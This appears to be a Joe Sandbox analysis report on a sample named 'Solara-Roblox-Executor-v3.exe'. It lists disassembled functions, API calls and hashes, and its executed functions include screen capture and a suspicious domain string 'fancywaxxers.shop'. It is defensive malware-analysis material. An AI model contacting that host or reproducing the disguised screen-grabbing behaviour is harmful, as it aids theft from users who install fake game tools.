Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1646373207-2564406000
Opcode ID: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
Instruction ID: 5e37eb1cb4c5440cf06a1bbe27d7e5c0606912c9c190fad6ce9ae0b106405ce5
Opcode Fuzzy Hash: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
Instruction Fuzzy Hash: D301B6709002089FCB01EFBCD94559DBBF8AB48300F40856AE849D7351EB34A6588F82

Function 0030F6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC), ref: 0030F6BD
GetLastError.KERNEL32(?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC,00000000,?,0030539C), ref: 0030F6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0030F6EF

Strings

api-ms-, xrefs: 0030F6D4

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
Instruction ID: 673b45aa6e689c056de9bf8afa637749a640298dd0a43d3a058c8046cf782d98
Opcode Fuzzy Hash: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
Instruction Fuzzy Hash: F6E04830281209BBEB331B61DC0AF983B589B04B50F254030FE0CA84F1DBA399949584

Function 0030D74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0030D7B1

Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0030DA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0030DA49
GetLastError.KERNEL32 ref: 0030DAEC

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
Instruction ID: 3b5e2853c1d91fae6da5bf354677a1794b0741c4fb939ec9e5663346d7bf8ad9
Opcode Fuzzy Hash: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
Instruction Fuzzy Hash: 78D14A75E052489FCB16CFE8C8909EEBBF9FF08314F24416AE455EB291D730A941CB50

Function 0030B576 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B5DA
__dosmaperr.LIBCMT ref: 0030B5E1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B61B
__dosmaperr.LIBCMT ref: 0030B622

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
Instruction ID: eb89c2a04d00236cf062da9c45ff5c47d17ca447c30883d58747664a0b4fba56
Opcode Fuzzy Hash: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
Instruction Fuzzy Hash: 5F21C271602209AFDB22AF65CCA0CABF7ACFF053647118468F919D75D0E732EC408BA4

Function 002FCA12 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
Instruction ID: 4a8204428d7f047a18e01d8e4f906484216aa2a122bcf44f360b225e75a7b053
Opcode Fuzzy Hash: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
Instruction Fuzzy Hash: DE21807122020EAFDB11EF74CD519BAF7A8EF403A47208524FA16C7550DB71FC608B60

Function 0030C96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0030C976

Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9CE

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 99d8d60c8dec36795fe67f25a765498717992fcf992c2cedc8ff641fc6043aea
Instruction ID: 86431c51ab962513408612365fffe231b11f54c46717b7f6ea055fd0b1fc018d
Opcode Fuzzy Hash: 99d8d60c8dec36795fe67f25a765498717992fcf992c2cedc8ff641fc6043aea
Instruction Fuzzy Hash: 7A11C4F2A1361D7FE71367B65CADCBF799CDE893947215215F801D5181FA22CD0189B0

Function 00314490 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000), ref: 003144A7
GetLastError.KERNEL32(?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?,?,0030D486,?), ref: 003144B3

Part of subcall function 00314510: CloseHandle.KERNEL32(FFFFFFFE,003144C3,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?), ref: 00314520

___initconout.LIBCMT ref: 003144C3

Part of subcall function 003144E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00314481,003139CC,?,?,0030DB40,?,00000000,00000000,?), ref: 003144F8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?), ref: 003144D8

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
Instruction ID: 8a6193ecb3d0c67ba0887ea8c4fd6cc0f5a06ebac7bcc86c7082a96b920ff16e
Opcode Fuzzy Hash: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
Instruction Fuzzy Hash: 9DF0AC3A511224BBCF271F96EC08AD93F6AFB4D7A1F058514FE1895120DA368861AB90

Function 002FA335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 002FA347
GetCurrentThreadId.KERNEL32 ref: 002FA356
GetCurrentProcessId.KERNEL32 ref: 002FA35F
QueryPerformanceCounter.KERNEL32(?), ref: 002FA36C

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
Instruction ID: 7f5d63be082fc715a90a5da0d52515c2fddb082c6a0e48f751318bcfd8494a74
Opcode Fuzzy Hash: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
Instruction Fuzzy Hash: BCF05F75D1020DEBCB01EBB4DA899DEBBF8FF1C704B9189A5A812E6110E734AA449B51

Function 0030A126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 0030A1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?), ref: 0030A21C

Strings

utf8, xrefs: 0030A2EE

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
Instruction ID: 658267192c86c197c2f7b75b07df88f0ec748f7025e6c9f7368984af5e7cee46
Opcode Fuzzy Hash: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
Instruction Fuzzy Hash: 9C51E435602B05AADB2BAB74AC62BB673ACEF08710F154469F9459B4C1F770ED4087A3

Function 00305170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00305071,?,?,00000000,00000000,00000000,?), ref: 00305195

Strings

RCC, xrefs: 003051AF
MOC, xrefs: 003051A7

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
Instruction ID: a75b7c3fcd5a6599d30866f7b0a95d2a0950c7bdfe87b5d6c4ce8da447aab61d
Opcode Fuzzy Hash: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
Instruction Fuzzy Hash: 50418972901609AFCF16CF94CD91AEEBBB9FF08300F198559FA08A7291D335A960DF51

Function 00309E8A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 003056B7: HeapFree.KERNEL32(00000000,00000000,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056CD
Part of subcall function 003056B7: GetLastError.KERNEL32(?,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056D8

___free_lconv_mon.LIBCMT ref: 00309ECE

Strings

T2, xrefs: 00309EA0
82, xrefs: 00309F76

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: 82$T2
API String ID: 4068849827-560637959
Opcode ID: 146cad94fb8428a00b6b900edc5f50c8edc3d5a4560b39460f9058404428801c
Instruction ID: 4365e22f81b5f2f4f32ce54d528723ca7613ddb80973316a368943235a520f10
Opcode Fuzzy Hash: 146cad94fb8428a00b6b900edc5f50c8edc3d5a4560b39460f9058404428801c
Instruction Fuzzy Hash: 7A315C316027059FEB22AA38D865B5673E8EF40311F51541AF499DB1D2DF32EC80CF14

Function 002F31C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002F31FD

Part of subcall function 002F3990: std::_Lockit::_Lockit.LIBCPMT ref: 002F39BE
Part of subcall function 002F3990: std::_Lockit::~_Lockit.LIBCPMT ref: 002F39E9

std::_Lockit::~_Lockit.LIBCPMT ref: 002F3315

Strings

Pq/, xrefs: 002F32CE

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: Pq/
API String ID: 593203224-235438668
Opcode ID: 9044836773b1c641cbc7c4e8006d86c94a3c4d88b9e7ab0207e18b7ae9dd0590
Instruction ID: d944da776bda62904e8407bdac48856d5d3d5a81039df1a0f032728189c5324f
Opcode Fuzzy Hash: 9044836773b1c641cbc7c4e8006d86c94a3c4d88b9e7ab0207e18b7ae9dd0590
Instruction Fuzzy Hash: DA4191B4E202089FCB14DFA8D995AEDBBF0BB08790F104569E916A7350DB70AE54CF91

Function 002F7712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002F771E
std::_Lockit::~_Lockit.LIBCPMT ref: 002F777A

Strings

Pq/, xrefs: 002F7745, 002F775F

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: Pq/
API String ID: 593203224-235438668
Opcode ID: 46698cc364737c2f242331c570b90cb15b3bd8bed2811e6828c3d5ffba104d71
Instruction ID: bfcbbb206c2b98fe1c6b9a4d408c4e76b6efc87de590fe46f7ab350b57ad8fe9
Opcode Fuzzy Hash: 46698cc364737c2f242331c570b90cb15b3bd8bed2811e6828c3d5ffba104d71
Instruction Fuzzy Hash: 8C0192356101199FCB01EF14C995EADB7B8EF84750F1540A9E9019B360DF70EE01CF50

Function 00306470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 003064B0

Strings

Pq/, xrefs: 003064A0
InitializeCriticalSectionEx, xrefs: 00306480

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$Pq/
API String ID: 2593887523-764408514
Opcode ID: b79974603c46927bb391ed49be65beb5f66259277ef8a977003d5299451e7fe7
Instruction ID: 8a0325e20ef245d9007690f2c1ed7be3673826b2ac782daf4f2ae3154b382e54
Opcode Fuzzy Hash: b79974603c46927bb391ed49be65beb5f66259277ef8a977003d5299451e7fe7
Instruction Fuzzy Hash: 93E09A32541228BBCB232F81CC07DDE7F19EF08BA0F048021FD28191A1CB728860AAD0

Function 003062F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0030632A

Strings

Pq/, xrefs: 00306320
FlsAlloc, xrefs: 00306306

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$Pq/
API String ID: 2773662609-413776159
Opcode ID: 52c74d8fd59f3e1ecd2e11ad16c7837385fec2cd475fa04cf7f5db224ae77462
Instruction ID: c44988b8551f02d4912308333f93c9aa622e74660477a30637b2640eade29d0d
Opcode Fuzzy Hash: 52c74d8fd59f3e1ecd2e11ad16c7837385fec2cd475fa04cf7f5db224ae77462
Instruction Fuzzy Hash: A3E0C236AC2329B3C21727915C079EA7E08DF9CF61B040022FD16151A0DEA5486046DA

Analysis Process: Solara-Roblox-Executor-v3.exePID: 2828, Parent PID: 5344COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.6%
Total number of Nodes:	240
Total number of Limit Nodes:	17

Executed Functions

Function 00433210 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 245
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(00000000), ref: 00433219
GetSystemMetrics.USER32(0000004C), ref: 00433229
GetSystemMetrics.USER32(0000004D), ref: 00433231
GetCurrentObject.GDI32(00000000,00000007), ref: 0043323A
GetObjectW.GDI32(00000000,00000018,?), ref: 0043324A
DeleteObject.GDI32(00000000), ref: 00433251
CreateCompatibleDC.GDI32(00000000), ref: 00433260
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043326B
SelectObject.GDI32(00000000,00000000), ref: 00433277
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0043329A

Strings

-, xrefs: 004334EE

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: -
API String ID: 1298755333-2547889144
Opcode ID: 4c70fb9fb3d48ba64cb561d81b8d275a8f00b4d1da52032b4a9da07f7ca7accf
Instruction ID: 90b179be33757c8483f2c3ae36f1dbb71152b8a45cb403c83c0cea2860a487ee
Opcode Fuzzy Hash: 4c70fb9fb3d48ba64cb561d81b8d275a8f00b4d1da52032b4a9da07f7ca7accf
Instruction Fuzzy Hash: 5B815DBB928320EFC7005FB8AC4566B7BA4FB5F751F060C3CF99193161D23999128B56

Function 004374E0 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 670
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 004376DD
SysAllocString.OLEAUT32(6C9C6E9F), ref: 0043778C
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004377CA
SysAllocString.OLEAUT32(19691F61), ref: 0043781C
SysAllocString.OLEAUT32(BD01C371), ref: 004378C2
VariantInit.OLEAUT32(E7E6E59C), ref: 00437931
VariantClear.OLEAUT32(?), ref: 00437B1D
SysFreeString.OLEAUT32(?), ref: 00437B45
SysFreeString.OLEAUT32(?), ref: 00437B4B
SysFreeString.OLEAUT32(00000000), ref: 00437B58

Strings

C, xrefs: 004375F2
BS, xrefs: 00437967
NG, xrefs: 00437A3C, 00437A40
UW, xrefs: 0043758A

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: BS$C$NG$UW
API String ID: 2485776651-3261164861
Opcode ID: 20eaceddd8dd319de19754652c22aa8ff6878be30dcee502cd68ab5d46434a8f
Instruction ID: 2aeba2e1066070774754ebb0687e9c69391b23f1472e6c47106a6c124882539a
Opcode Fuzzy Hash: 20eaceddd8dd319de19754652c22aa8ff6878be30dcee502cd68ab5d46434a8f
Instruction Fuzzy Hash: 592212B2A083009BD314CF24C881B5BBBE6FBC9714F14892DE9D597391D778E906CB96

Function 0040DA95 Relevance: 17.1, APIs: 2, Strings: 9, Instructions: 584
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040DAA1
CoUninitialize.COMBASE ref: 0040DE88

Strings

y{, xrefs: 0040E1E7
|}, xrefs: 0040E1EF
QS, xrefs: 0040E0AF
fancywaxxers.shop, xrefs: 0040DE6F, 0040E25F
C], xrefs: 0040E18B
@C, xrefs: 0040E196
ZV, xrefs: 0040E175
ssr, xrefs: 0040DF47
IP, xrefs: 0040E180

Memory Dump Source

